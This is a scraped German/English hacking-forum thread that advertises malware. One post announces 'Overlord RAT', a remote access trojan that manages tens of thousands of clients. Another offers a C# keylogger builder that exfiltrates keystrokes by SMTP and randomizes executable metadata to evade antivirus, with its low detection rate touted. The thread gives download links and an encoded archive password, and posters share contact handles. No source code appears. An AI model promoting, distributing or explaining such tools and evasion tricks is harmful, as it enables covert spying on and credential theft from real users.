Jump to content

Overlord RAT (Free, Mac, Linux, Windows, Open Source)


  • Reply to this topic
  • Start new topic

Recommended Posts

Overlord RAT (Free, Mac, Linux, Windows, Open Source)

Overlord ist jetzt offiziell live.
Es fehlen aktuell noch einige Funktionen, da es sich in der Beta-Phase befindet, aber ich verspreche, dass es seinem Namen gerecht wird.

https://github.com/vxaboveground/Overlord

Vielen Dank für eure Unterstützung – ich hoffe, es gefällt euch.

Einige der wichtigsten Funktionen:

1.) Funktioniert auf Windows, macOS und Linux (Server und Client)
2.) Kann zehntausende Clients verwalten
3.) Sehr schnell dank WebSockets
4.) CSP zum Schutz vor XSS-Schwachstellen (falls vorhanden)
5.) Verarbeitet Dateien über den Browser, um Remote Code Execution (RCE) zu verhindern
6.) „Extrem gut“ (umgangssprachlich)
7.) Entwickelt vom Ersteller von Pulsar

    •  258

It's being some time since i gave something back to community. I am still in learning of c# code and i decide to take some dive into KeyLogger programming. This tool took me around 6h to code. some function could be definitely coded better and there are still some bugs i need to investigate but for testing purposes its fine.

Here’s a high-level overview of the functionalities provided by the code:

I am using MaterialSkin for this tool since ootb framework in visual studio is not that pleasing...

  • Dynamic Assembly Name and Attributes:
    Randomized names and attributes (like, title, description, version) are generated for the compiled executable using predefined adjective and noun arrays. Here i used believable names not just random strings. These attributes are included as assembly metadata for the generated executable.
     
  • Input Handling for SMTP Configuration:
    User-provided inputs such as SMTP server, email credentials, recipient email, and a time interval are collected via textboxes.
    These values are dynamically replaced in the source code template. I am using default SMTP port 587.
     
  • Source Code Augmentation:
    Necessary assembly attributes (like, version, company, product). They are also randomly generated from pool of predefined wordlist and later on used in compilation.
     
  • Code Compilation:
    The application compiles the modified source code which is stored within tool itself, into an executable file dynamically using the CSharpCodeProvider class.
    Compiler parameters include settings for a Windows executable target, x86 platform, and external assemblies required by the generated code. So yea, its 32bit application with .net 4.5 dependency.
     
  • Executable Generation:
    A unique name for the executable is generated dynamically (like, BrightFox123.exe).
    The compiled executable incorporates the user-provided SMTP settings and dynamically generated assembly.
    Generated stub has only around 9-10kb !
    Current detection is 3/38 on kleenscan https://kleenscan.com/scan_result/f4d99d...b6b0b66c7d
     


Tool is protected with VMProtect against reverse engineering. For generated executable you can use ILSpy to check the source code, its not protected at all and free for viewing.
Feel free to test it out and if you find bugs please report them back to me, i will try to fix it in next release.

Download LINK:
https://mega.nz/file/sY5F0ZYZ#_3j2t4DfwP...GWKfN_LWvk
Pass for zip is Base64 encoded: UE9DRGFya1RlcnJvcktMRw==
 

Some Screenshots

 

[Image: SYweBZ3.png]
[Image: pZuhJlK.png]
[Image: yLvVm0u.png]
Grundsätzlich gilt:
Virusscan und VM ist euer Freund.
Da die meisten geuppten Tools Stealer, Rats, Bots etc. sind wird fast jedes AV eine Warnmeldung abgebeben.
Das ist bei diesen Programmen normal, macht die Sache abr für Anfänger nicht besser!
 
Btw:
Die Tools sind nicht von mir!
Wie sagt man so schön:
Das ist alles nur geklaut und gestohlen, nur gezogen und geraubt. 
Entschuldigung, das hab ich mir erlaubt.
 

Narco neu111.png

 

Hab dir ja die Quelle genannt.

Da hast du Lesematerial für Wochen....:classic_wink:

8175AB38-2006-4BC6-8177-0048747920A1.jpeg.834aa5e60d526ebc5f8f43df4c7086a9.jpeg

Ich bin nur in einem unter den Namen BullDDoSer a.k.a. Bulli unterwegs!
SESSION: 

051579b82cbe395805a79580cbabd86eab1365561b8805703f31cd9b96997c8552

Threema

HUZWDPY3

 

Sollten weitere Fragen auftauchen an mich oder meinen Kumpel Narco wenden.

Der ist eigentlich eher selten online.:classic_wink:

8175AB38-2006-4BC6-8177-0048747920A1.jpeg.834aa5e60d526ebc5f8f43df4c7086a9.jpeg

Ich bin nur in einem unter den Namen BullDDoSer a.k.a. Bulli unterwegs!
SESSION: 

051579b82cbe395805a79580cbabd86eab1365561b8805703f31cd9b96997c8552

Threema

HUZWDPY3

 

  • 3 weeks later...
Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...